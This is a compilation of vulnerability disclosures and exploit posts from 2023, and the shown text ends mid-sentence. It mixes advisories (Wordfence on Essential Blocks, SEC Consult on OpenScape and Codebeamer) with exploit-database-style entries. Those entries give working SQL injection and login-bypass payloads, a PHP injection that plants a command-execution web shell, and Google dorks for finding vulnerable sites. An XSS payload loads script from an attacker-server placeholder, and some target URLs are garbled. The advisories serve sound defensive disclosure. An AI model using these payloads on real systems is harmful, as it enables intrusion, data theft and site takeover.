<pre><code>Vulnerability Summary from Wordfence Intelligence<br /><br />Description: Insecure Deserialization/PHP Object Injection via queries <br /><br />Affected Plugin: Essential Blocks, Essential Blocks Pro<br /><br />Plugin slug: essential-blocks, essential-blocks-pro<br /><br />Vendor: WPDeveloper<br /><br />Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)<br /><br />CVE ID: CVE-2023-4386<br /><br />CVSS score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher: Marco Wotschka <br /><br />Fully Patched Version: 4.2.1 & 1.1.1<br /><br />The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.<br /><br />Description: Insecure Deserialization/PHP Object Injection via products <br /><br />Affected Plugin: Essential Blocks, Essential Blocks Pro<br /><br />Plugin slug: essential-blocks<br /><br />Vendor: WPDeveloper<br /><br />Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)<br /><br />CVE ID: CVE-2023-4402<br /><br />CVSS score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher: Marco Wotschka <br /><br />Fully Patched Version: 4.2.1 & 1.1.1<br /><br />The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_products function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.<br /><br />Technical Analysis<br /><br />The Essential Blocks plugin provides more than 40 blocks to its users including sliders, buttons, pricing tables, maps and others. An API is provided to query for posts and products via the queries and products API endpoints which do not require authentication.<br /><br />Unfortunately, query data and attributes were passed in PHP’s serialized string format and were subsequently unserialized by the functions get_posts (for the queries endpoint) and get_products (for the products endpoint) in /includes/API/PostBlock.php and /includes/API/Product.php, respectively.<br /><br />php-objection-injection-posts <br /><br />get_posts function<br /><br />php-objection-injection-products <br /><br />get_products function<br /><br />Attackers could utilize this to inject a PHP object with properties of their choosing. The presence of a PHP POP chain can make it possible for an attacker to execute arbitrary code, create and delete files and potentially ultimately take over a vulnerable site. Fortunately, no POP chain is present in the Essential Blocks plugin, which means an attacker would require another plugin or theme installed on the vulnerable site with a POP chain present in order to fully exploit these vulnerabilities. It is worth mentioning that POP chains can sometimes be found in popular plugins and libraries which include destructor methods that perform cleanup tasks when an Object is destroyed or deserialized.<br /><br />Despite the lack of a POP chain in the Essential Blocks plugin itself, and the complexity involved in exploiting these types of vulnerabilities, a successful attack often leads to severe consequences. We explain how PHP Object Injections work in this blog post, if you are interested to find out more about their inner workings.<br /><br />Timeline<br /><br />August 17, 2023 – The Wordfence Threat Intelligence team discovers two PHP Object Injection vulnerabilities in the Essential Blocks plugin.<br /><br />August 18, 2023 – We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers and initiate the disclosure process.<br /><br />August 23, 2023 – We send the full disclosure to the plugin developer.<br /><br />August 29, 2023 – A patched version of the Essential Blocks plugin, 4.2.1 (1.1.1 for Pro), is released.<br /><br />September 17, 2023 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In this blog post, we covered two PHP Object Injection vulnerabilities in the Essential Blocks plugin affecting versions 4.2.0 and earlier in the Free version of the plugin and versions 1.1.0 and earlier in the Pro version. These vulnerabilities allow unauthenticated threat actors to query the plugin’s API using serialized malicious payloads that are subsequently deserialized. They have been fully addressed in version 4.2.1 of the free version of the plugin and 1.1.1 of the Pro version of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Essential Blocks.<br /><br />All Wordfence running Wordfence Premium, Wordfence Care, and Wordfence Response, have been protected against these vulnerabilities as of August 18, 2023. Users still using the free version of Wordfence received protection on September 17, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code># Exploit Title: taskhub 2.8.7 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 05/09/2023<br /># Vendor: Infinitie Technologies<br /># Vendor Homepage: https://www.infinitietech.com/<br /># Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874<br /># Demo: https://taskhub.company/auth<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4987<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /home/get_tasks_list<br /><br />GET parameter 'project' is vulnerable to SQL Injection<br />GET parameter 'status' is vulnerable to SQL Injection<br />GET parameter 'user_id' is vulnerable to SQL Injection<br />GET parameter 'sort' is vulnerable to SQL Injection<br />GET parameter 'search' is vulnerable to SQL Injection<br /><br /><br />https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]<br /><br /><br />---<br />Parameter: project (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: status (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: user_id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: sort (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=<br /><br />Parameter: search (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote<br />Code Execution<br /># Researcher : Etharus<br /># Vendor : Joe Iz, https://www.superstorefinder.net/<br /># Demo Url : https://superstorefinder.net/products/superstorefinder/<br /># Version Affected : 3.7 and below<br /># Date : 18 September 2023<br /># FOFA Dork : "designed and built by Joe Iz."<br /># Step 1 : Login as user/admin<br /># Step 2 : Go to Settings on right top<br /># Step 3 : Turn on proxy to intercept request and save the settings<br /># Step 4 : On language_set parameter set the value to<br /> en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//<br /># Step 5 : Due to index.php called config.inc.php , we just can go for rce<br />with parameter ?cmd=<br /># Step 6 : Example. http://localhost/?cmd=uname%20-a<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano CMS v2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.progetis.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & Pass : 1' or 1=1 -- -<br /><br />[+] https://www.sylviebecker127.0.1.1lu<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : lacabane v1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.samuelniang.eu/cv.html | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload in user & pass : 1'or'1'='1<br /><br />[+] http://lacabanedesloupiots127.0.0.1com/admin.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection<br /># Exploit Author: Sefa Ozan<br /># Date: 16/09/2023<br /># Vendor: MAYURIK<br /># Vendor Homepage: https://mayurik.com/<br /># Software Link: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html<br /># Tested on: Windows 10 Pro & Ubuntu 22.04<br /><br /><br />## Description:<br />The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability, the database was put to sleep for 10 seconds.<br /><br /><br />## Request: <br />POST /ample/app/action/sell.php HTTP/1.1<br />Host: localhost<br />User-Agent: python-requests/2.31.0<br />Accept-Encoding: gzip, deflate, br<br />Accept: */*<br />Connection: close<br />Content-Length: 297<br />Content-Type: application/x-www-form-urlencoded<br /><br />customer_name=1&orderdate=16/12/2023&pid[]=1+AND+(SELECT+IF+(1=1,sleep(10),'A'))='A'+OR+'SEFA'=:value&total_quantity[]=12&price[]=4500&orderQuantity[]=1&totalPrice[]=4500&pro_name[]=&subtotal=4500&s_discount_amount=0&discount=&prev_due=12&netTotal=4500&paidBill=123&dueBill=4377&payMethode=PhonePe<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230918-0 ><br />=======================================================================<br /> title: Authenticated Remote Code Execution and<br /> Missing Authentication<br /> product: Atos Unify OpenScape Session Border Controller<br /> Atos Unify OpenScape Branch<br /> Atos Unify OpenScape BCF<br /> vulnerable version: OpenScape SBC before V10 R3.3.0<br /> OpenScape Branch V10 before V10 R3.3.0<br /> OpenScape BCF V10 before V10 R10.10.0<br /> fixed version: OpenScape SBC V10 >=R3.3.0<br /> OpenScape Branch V10 >=R3.3.0<br /> OpenScape BCF V10 >=R10.10.0<br /> CVE number: CVE-2023-36618, CVE-2023-36619<br /> impact: critical<br /> homepage: https://unify.com<br /> found: 2023-04-21<br /> by: Armin Weihbold (Office Linz)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Unify is is the Atos brand for communication and collaboration solutions<br />Unify is the newest member of the Atos family, combining Atos’ knowledge and<br />reputation in the IT services market with Unify’s expertise in unified<br />communications and collaboration to provide customers with seamless services<br />solutions for their entire digital portfolio. Within Atos, Unify continues to<br />deliver a unique integrated proposition for unified communications and real<br />time capabilities."<br /><br />Source: https://unify.com/en/expert/unify<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends users of the affected products to install the latest<br />update.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected from other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Remote Code Execution (CVE-2023-36618)<br />The API of the administrative web application insufficiently validates the<br />input of authenticated users at the server. This leads to the possibility of<br />executing arbitrary PHP functions (with some defined exceptions) and<br />subsequently operating system level commands with root privileges.<br />A low-privileged ReadOnly role is sufficient to exploit this security issue.<br /><br />2) Missing Authentication (CVE-2023-36619)<br />A number of scripts that are used to administer the appliance can be<br />accessed or executed unauthenticated via the web server.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Remote Code Execution (CVE-2023-36618)<br />A large part of the application is built according to the scheme in the<br />following listing. Some functions are defined and at the end the function<br />`callMainFunction` is called, which takes care of processing POST data.<br /><br />-----------------------------------------------------------------------<br /> <?php<br /> require_once '../core/CoreAPI.php';<br /><br /> function tempSessionAcdQueue($args = null)<br /> {<br /> [...SNIP...]<br /> }<br /><br /> function getAcdQueueInfo($args = null) {<br /> [...SNIP...]<br /> }<br /><br /> // calls function which will handle the Post requests<br /> callMainFunction();<br />-----------------------------------------------------------------------<br /><br />`callMainFunction` in `/srv/www/htdocs/core/CoreAPI.php` essentially<br />calls arbitrary functions with arbitrary arguments passed via POST parameters,<br />and only tests beforehand whether or not they are in a list of forbidden<br />functions (`cfgUtilCheckMethod`) and whether the user is authenticated:<br /><br />-----------------------------------------------------------------------<br /> <?php<br />[...]<br /> require_once 'cfgUtil.php';<br />[...]<br /><br /><br /> function callMainFunction () {<br /><br /> $func = ( isset($_POST['method']) ) ? trim(cfgUtilGetPostData('method')) : null ;<br /> if (cfgUtilCheckMethod($func)) return;<br /> $args = ( isset($_POST['args']) ) ? cfgUtilSanitizePostArgs(json_decode($_POST['args'], true)) : null ;<br />[...]<br /><br /> if ( function_exists($func) && is_callable($func) ) {<br /> @session_start();<br /> if (!isset($_SESSION["Authenticated"]) || ($_SESSION["Authenticated"] == false)) {<br /> session_destroy();<br />[...]<br /> } else {<br /> if ( $args != null ) $func($args);<br /> else $func();<br /> }<br /> }<br /> }<br />-----------------------------------------------------------------------<br /><br />Then `cfgUtilCheckMethod` in `/srv/www/htdocs/core/cfgUtil.php` checks for a number<br />of dangerous functions which should get blocked:<br /><br />-----------------------------------------------------------------------<br />function cfgUtilCheckMethod($func)<br />{<br /> if (isset($func)) {<br /> // block methods<br /> $methods = array(<br />[...]<br /> “eval”,<br /> “exec”,<br />[...]<br /> “shell_exec”,<br />[...]<br /> “system”,<br /> );<br /> if (in_array($func, $methods)) return 1;<br /> }<br /> return 0;<br />}<br />-----------------------------------------------------------------------<br /><br />What has been forgotten here are the functions provided by cfgUtil.php itself<br />like `cfgUtilExecute`, `cfgUtilShellExec` and especially<br />`cfgUtilShellExecSudo`, `cfgUtilSetPermExecSudo` and `cfgUtilExecSudo`.<br /><br />These functions allow an authenticated attacker (a ReadOnly role is sufficient<br />for this) to execute arbitrary commands as root user on the appliance.<br /><br />-----------------------------------------------------------------------<br />function cfgUtilShellExecSudo( $command, $escape = TRUE, $supressLog = FALSE )<br />{<br /> $newcommand=$command;<br /> if ( $escape == TRUE ) $newcommand = escapeshellcmd($command);<br /> if ( ($newcommand != $command) and ($supressLog != TRUE ) )<br /> osb_log(E_WARNING, debug_backtrace()[1][‘function’]. “(): The command: “ . $command . “ is not equivalent to: “ . $newcommand);<br /> $retvalue = trim(shell_exec(‘/usr/bin/sudo ‘ . $newcommand ));<br /> return $retvalue;<br />}<br />-----------------------------------------------------------------------<br /><br />To demonstrate the RCE vulnerability, it is sufficient to send a request like<br />the following to any endpoint that calls `callMainFunction` like in:<br />[PoC URL removed]<br />-----------------------------------------------------------------------<br />[PoC POST request removed]<br />-----------------------------------------------------------------------<br /><br /><br />The server response indicates a successful request:<br />-----------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Fri, 21 Apr 2023 10:22:42 GMT<br />Server: Apache<br />X-Frame-Options: SAMEORIGIN<br />Expires: 0<br />Cache-Control: max-age=0, must-revalidate<br />Pragma: no-cache<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-----------------------------------------------------------------------<br /><br />If we now list the contents of the `/tmp` directory on the server, we see<br />that the file `root_from_ro` was created by the root user:<br /><br /><br />-----------------------------------------------------------------------<br />user@server:/tmp> ls -al<br />[...]<br />-rw-r--r-- 1 root root 0 Apr 21 10:22 root_from_ro<br />-----------------------------------------------------------------------<br /><br /><br />2) Missing Authentication (CVE-2023-36619)<br />The following scripts, which are executable without authentication and<br />do not expect command line arguments, could be identified. For this,<br />heuristic methods based on the source code were used. In particular, scripts<br />were searched that do not use any of the normally used authentication<br />methods and do not only consist of classes.<br /><br />- https://hostname/core/configuringInBackground.php<br />- https://hostname/core/downloadProfiles.php<br />- https://hostname/core/hello_world.php<br />- https://hostname/core/scripts/applyZooServerData.php<br />- https://hostname/core/scripts/cfgGenUpdateSSPStatusTable.php<br />- https://hostname/core/scripts/checkcardsDbHw.php<br />- https://hostname/core/scripts/config1.php<br />- https://hostname/core/scripts/recover.php<br />- https://hostname/core/scripts/start.php<br />- https://hostname/core/scripts/startPre.php<br />- https://hostname/core/shutdown.php<br />- https://hostname/data/sipLbInfo.php<br />- https://hostname/data/turnInfo.php<br /><br />The following demonstrates an execution. The following request is sent<br />to the appliance:<br /><br /><br />-----------------------------------------------------------------------<br />GET /core/scripts/start.php HTTP/1.1<br />Host: hostname<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: document<br />Referer: https://hostname/acd.html<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br />-----------------------------------------------------------------------<br /><br />In the successful response, the time is highlighted to compare with the PHP<br />log:<br /><br />-----------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Thu, 20 Apr 2023 11:47:34 GMT<br />Server: Apache<br />X-Frame-Options: SAMEORIGIN<br />Cache-Control: max-age=0, must-revalidate<br />Pragma: no-cache<br />Expires: 0<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-----------------------------------------------------------------------<br /><br />In the PHP log you will now find the following output, which shows that<br />this script is used for configuring and starting the appliance and was<br />actually executed:<br /><br />-----------------------------------------------------------------------<br />2023-04-20T11:47:34+00:00 [notice] PHP Notice: --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 33<br />[...] ---------- Running start.php ---------- in /srv/www/htdocs/core/scripts/start.php on line 34<br />[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 35<br />[...] Loading XML in /srv/www/htdocs/core/scripts/start.php on line 61<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 599<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 600<br />[...] ---------- Running start() OSS ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 601<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 602<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 603<br />[...] Starting start() OSS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 607<br />[...] Active partition: 4 /dev/sda6 in /srv/www/htdocs/core/ConfigMgrOSS.php on line 613<br />[...] Calling hookStart start in /srv/www/htdocs/core/ConfigMgrOSS.php on line 622<br />[...] Configuring Alarm in /srv/www/htdocs/core/ConfigMgrOSS.php on line 626<br />[...] Configuring Node for Redundancy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 630<br />[...] Red. Selection cleared (standlone)... in /srv/www/htdocs/core/NetServicesData.php on line 162<br />[...] Redundant Node 1 removed in /srv/www/htdocs/core/NetServicesData.php on line 163<br />[...] Redundant Node 2 removed in /srv/www/htdocs/core/NetServicesData.php on line 164<br />[...] Configuring Watchdog in /srv/www/htdocs/core/ConfigMgrOSS.php on line 640<br />[...] Configuring irqBalance in /srv/www/htdocs/core/ConfigMgrOSS.php on line 644<br />[...] Configuring OpenVmWare in /srv/www/htdocs/core/ConfigMgrOSS.php on line 648<br />[...] Configuring RADIUS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 662<br />[...] Configuring SSH Public Keys in /srv/www/htdocs/core/ConfigMgrOSS.php on line 666<br />[...] Configuring IP Aliases in /srv/www/htdocs/core/ConfigMgrOSS.php on line 671<br />[...] Configuring Traffic Shaping in /srv/www/htdocs/core/ConfigMgrOSS.php on line 679<br />[...] Configuring Zookeeper Client in /srv/www/htdocs/core/ConfigMgrOSS.php on line 688<br />[...] Configuring RTP Proxy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 693<br />[...] Configuring SSM in /srv/www/htdocs/core/ConfigMgrOSS.php on line 697<br />[...] Configuring SipServer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 705<br />[...] UA WhiteList: in /srv/www/htdocs/core/cfgSipServerSP.php on line 2896<br />[...] simplexml_load_file( /osb/var/mngmt/xml/running/config_20_20230223T115247.xml ) in /srv/www/htdocs/core/PersistenceMgr.php on line 520<br />[...] Circuit feature enabled ? 0 in /srv/www/htdocs/core/AnsibleData.php on line 42<br />[...] New xml cache file created daec97748bc1828d8514ee16e200a834 in /srv/www/htdocs/core/PersistenceMgr.php on line 1883<br />[...] Locking SSP Register in /srv/www/htdocs/core/cfgSipServerOSS.php on line 2682<br />[...] SipServer configuration changed. in /srv/www/htdocs/core/cfgSipServerSP.php on line 2595<br />[...] Configuring Media Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 726<br />[...] Configuring IPSec in /srv/www/htdocs/core/ConfigMgrOSS.php on line 734<br />[...] Configuring VPN in /srv/www/htdocs/core/ConfigMgrOSS.php on line 741<br />[...] Configuring Certificate Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 745<br />[...] Configuring Web Secure Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 749<br />[...] Configuring TURN Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 754<br />[...] Configuring Sip Loadbalancer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 759<br />[...] Configuring GTC Loader in /srv/www/htdocs/core/ConfigMgrOSS.php on line 764<br />[...] Configuring GTC Node app in /srv/www/htdocs/core/ConfigMgrOSS.php on line 769<br />[...] Configuring Serviceability in /srv/www/htdocs/core/ConfigMgrOSS.php on line 774<br />[...] Configuring QoS Send Trap in /srv/www/htdocs/core/ConfigMgrOSS.php on line 779<br />[...] Configuring Push Notification in /srv/www/htdocs/core/ConfigMgrOSS.php on line 784<br />[...] Configuring Branding in /srv/www/htdocs/core/ConfigMgrOSS.php on line 797<br />[...] Calling hookStart stop in /srv/www/htdocs/core/ConfigMgrOSS.php on line 800<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 838<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 839<br />[...] ---------- Done start() OSS ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 840<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 841<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 842<br />[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 77<br />[...] ---------- Done start.php (0) --------- in /srv/www/htdocs/core/scripts/start.php on line 78<br />[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 79<br />[...]<br />-----------------------------------------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* OpenScape Session Border Controller Firmware Version V10 R3.01.03<br /><br />According to vendor, versions before V10 R3.3.0 are affected as well.<br /><br />The vendor confirmed that the following other products are vulnerable as well:<br />* OpenScape Branch version before V10 R3.3.0<br />* OpenScape BCF version before V10 R10.10.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through email obso@atos.net; sending<br /> encrypted advisory (S/MIME)<br />2023-06-15: Call with vendor, discussing release and timeline.<br /> Requesting CVE numbers through MITRE.<br />2023-06-28: Vendor provides update regarding timeline / patch availability and<br /> affected products.<br /> Sending received CVE numbers to vendor.<br />2023-06-29: Vendor provides draft of their security advisory including<br /> planned release dates of patched versions. Giving feedback.<br /> Receiving download URL from vendor.<br />2023-07-04: Receiving updated version of vendor security advisory,<br /> providing some more feedback/minor fixes.<br />2023-07-06: Vendor releases security advisory and patches.<br />2023-09-18: Coordinated release of advisory<br /><br /><br />Solution:<br />---------<br />The vendor provides a patch for the affected products:<br />* OpenScape Session Border Controller Firmware Version V10 >=R3.3.0<br />* OpenScape Branch version V10 >=R3.3.0<br />* OpenScape BCF version V10 >=R10.10.0<br /><br />The patches can be obtained for registered customers through the vendor's<br />download server:<br />https://sws.unify.com/SWSIntranet/SWSIntra.aspx or via<br />https://unify.com/en/partner/partnerportal<br />https://unify.com/en/support/kunden-support-portal<br /><br />Furthermore, the vendor has also released a security advisory which is<br />available here:<br />https://networks.unify.com/security/advisories/OBSO-2307-01.pdf<br /><br /><br />Workaround:<br />-----------<br />Limit access to the administrative web application to authorized personnel<br />on the network level.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF A. Weihbold / @2023<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230829-0 ><br />=======================================================================<br /> title: Reflected Cross-Site Scripting (XSS)<br /> product: PTC - Codebeamer (ALM Solution)<br /> vulnerable version: <=22.10-SP7, <=22.04-SP5, <=21.09-SP13<br /> fixed version: >=22.10-SP8, >=22.04-SP6, >=21.09-SP14<br /> CVE number: CVE-2023-4296<br /> impact: high<br /> homepage: https://www.ptc.com/en/products/codebeamer<br /> found: 2023-04-14<br /> by: Niklas Schilling (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Codebeamer offers unique digital workflows that help your teams improve<br />development collaboration, product line development efficiency, and regulatory<br />compliance. Codebeamer's open platform extends application lifecycle management<br />functionalities with product line configuration capabilities, and provides<br />unique configurability for complex processes. Connect all development tools to<br />give your teams a single development platform. You can also easily adapt the<br />solution to specific development needs and automate process control for<br />regulatory compliance."<br /><br />Source: https://www.ptc.com/en/products/codebeamer<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends PTC customers to install the latest updates.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected from other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected Cross-Site Scripting (XSS) Vulnerability (CVE-2023-4296)<br />The dynamic Error Page in Codebeamer is vulnerable to a reflected XSS attack.<br />It successfully sanitizes malicious HTML tags such as <script> and various<br />JavaScript events like "onload" or "onerror" that can be used to execute arbitrary<br />JavaScript code when a certain event occurs.<br /><br />However, it was possible to bypass these restrictions, allowing an attacker<br />to inject arbitrary JavaScript code which will be executed in the victim's<br />browser upon clicking on a malicious link.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected Cross-Site Scripting (XSS) Vulnerability (CVE-2023-4296)<br />To verify this vulnerability, it is sufficient to open the following URL as<br />an unauthenticated user in a web browser:<br />https://<CODEBEAMER_SERVER>/errorHandler.spr?fileName=<html onpointermove = alert(window.origin)><br /><br />When a user now moves the cursor anywhere on the Error Page, the<br />"onpointermove" event triggers, resulting in the execution of the alert()<br />function.<br /><br />To further demonstrate the criticality of this vulnerability, the following<br />XSS payload can be used:<br /><br />https://<CODEBEAMER_SERVER>/errorHandler.spr?fileName=<html onpointermove =<br />"if(!document.getElementById('SEC1337')){window.x=document.createElement('script');<br />window.x.id='SEC1337';window.x.src ='https://<ATTACKER_SERVER>/poc.js';<br />document.body.appendChild(window.x);}"></html><br /><br />Note that the 